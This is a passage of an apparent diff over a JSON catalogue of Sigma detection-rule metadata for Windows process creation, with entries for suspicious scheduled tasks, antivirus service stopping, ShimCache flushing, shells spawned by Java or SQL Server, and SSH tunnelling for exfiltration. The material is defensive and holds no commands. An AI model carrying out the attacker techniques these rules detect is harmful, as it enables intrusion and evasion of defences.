"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/02/21", - "filename": "proc_creation_win_susp_schtasks_env_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "value": "Schtasks From Suspicious Folders", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/04/15", - "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "uuid": "9494479d-d994-40bf-a8b1-eea890237021", - "value": "Suspicious Add Scheduled Task Parent", - "meta": { - "refs": [ - "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/02/23", - "filename": "proc_creation_win_susp_schtasks_parent.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", - "value": "Suspicious Add Scheduled Command Pattern", - "meta": { - "refs": [ - "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/02/23", - "filename": "proc_creation_win_susp_schtasks_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", - "value": "Suspicious Schtasks Schedule Types", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitmate processes that run at logon. Filter according to your environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", - "value": "Suspicious Schtasks Schedule Type With High Privileges", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/08/31", - "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some installers were seen using this method of creation unfortunately. Filter them in your environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "schtasks.exe create task from user AppData\\Local\\Temp", - "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", - "value": "Suspicious Add Scheduled Task From User AppData Temp", - "meta": { - "refs": [ - "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2021/11/03", - "filename": "proc_creation_win_susp_schtasks_user_temp.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of scheduled tasks in user session", - "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", - "value": "Scheduled Task Creation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_schtask_creation.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative activity", - "Software installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "value": "Suspicious Scheduled Task Creation Involving Temp Folder", - "meta": { - "refs": [ - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2021/03/11", - "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity", - "Software installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", - "value": "ScreenConnect Remote Access", - "meta": { - "refs": [ - "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2021/02/11", - "filename": "proc_creation_win_susp_screenconnect_access.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use by administrative staff" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "value": "Suspicious ScreenSave Change by Reg.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ], - "creation_date": "2021/08/19", - "filename": "proc_creation_win_susp_screensaver_reg.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "GPO" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious file execution by wscript and cscript", - "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "value": "WSF/JSE/JS/VBA/VBE File Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_script_execution.yml", - "author": "Michael Haag", - "level": "medium", - "falsepositive": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", - "value": "Script Interpreter Execution From Suspicious Folder", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/02/08", - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious script executions from temporary folder", - "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", - "value": "Suspicious Script Execution From Temp Folder", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_script_exec_from_temp.yml", - "author": "Florian Roth, Max Altgelt, Tim Shelton", - "level": "high", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", - "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "value": "Potential Suspicious Activity Using SeCEdit", - "meta": { - "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" - ], - "tags": [ - "attack.discovery", - "attack.persistence", - "attack.defense_evasion", - "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" - ], - "creation_date": "2022/11/18", - "filename": "proc_creation_win_susp_secedit.yml", - "author": "Janantha Marasinghe", - "level": "medium", - "falsepositive": [ - "Legitimate administrative use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", - "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "value": "Suspicious Service DACL Modification", - "meta": { - "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003" - ], - "creation_date": "2020/10/16", - "filename": "proc_creation_win_susp_service_dacl_modification.yml", - "author": "Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "meta": { - "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003" - ], - "creation_date": "2022/10/18", - "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service binary running in a suspicious directory", - "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", - "value": "Suspicious Service Binary Directory", - "meta": { - "refs": [ - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/03/09", - "filename": "proc_creation_win_susp_service_dir.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", - "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", - "value": "Stop Or Remove Antivirus Service", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/07", - "filename": "proc_creation_win_susp_service_modification.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", - "value": "Suspicious Service Path Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_susp_service_path_modification.yml", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", - "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "value": "Suspicious Stop Windows Service", - "meta": { - "refs": [ - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_susp_service_stop.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrator or tools shutting down the services due to upgrade or removal purposes. If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "uuid": "75578840-9526-4b2a-9462-af469a45e767", - "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "value": "Suspicious Serv-U Process Pattern", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_servu_process_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "value": "Suspicious Execution of SharpView Aka PowerView", - "meta": { - "refs": [ - "https://github.com/tevora-threat/SharpView/", - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" - ], - "creation_date": "2021/12/10", - "filename": "proc_creation_win_susp_sharpview.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", - "value": "Suspicious Usage Of ShellExec_RunDLL", - "meta": { - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "value": "Suspicious Shells Spawned by Java", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/12/17", - "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "value": "Suspicious Shells Spawn by Java Utility Keytool", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/12/22", - "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "value": "Suspicious Shells Spawn by SQL Server", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" - ], - "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2020/12/11", - "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", - "author": "FPT.EagleEye Team, wagga", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", - "value": "Suspicious Processes Spawned by WinRM", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/05/20", - "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", - "level": "high", - "falsepositive": [ - "Legitimate WinRM usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "uuid": "b0524451-19af-4efa-a46f-562a977f792e", - "value": "ShimCache Flush", - "meta": { - "refs": [ - "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2021/02/01", - "filename": "proc_creation_win_susp_shimcache_flush.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use of the commandline to shutdown or reboot windows", - "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", - "value": "Suspicious Execution of Shutdown", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_shutdown.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "value": "Suspicious Splwow64 Without Params", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_susp_splwow64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "value": "Suspicious Spool Service Child Process", - "meta": { - "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/07/11", - "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Possible Squirrel Packages Manager as Lolbin", - "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", - "value": "Squirrel Lolbin", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", - "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2019/11/12", - "filename": "proc_creation_win_susp_squirrel_lolbin.yml", - "author": "Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "1Clipboard", - "Beaker Browser", - "Caret", - "Collectie", - "Discord", - "Figma", - "Flow", - "Ghost", - "GitHub Desktop", - "GitKraken", - "Hyper", - "Insomnia", - "JIBO", - "Kap", - "Kitematic", - "Now Desktop", - "Postman", - "PostmanCanary", - "Rambox", - "Simplenote", - "Skype", - "Slack", - "SourceTree", - "Stride", - "Svgsus", - "WebTorrent", - "WhatsApp", - "WordPress.com", - "Atom", - "Gitkraken", - "Slack", - "Teams" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - "value": "Suspicious SSH Port Forwarding", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2022/10/12", - "filename": "proc_creation_win_susp_ssh_port_forward.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative activity using a remote port forwarding to a local port" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "value": "Suspicious SSH Usage RDP Tunneling", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ], - "creation_date": "2022/10/12", - "filename": "proc_creation_win_susp_ssh_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious svchost process start", - "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "value": "Suspicious Svchost Process", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": 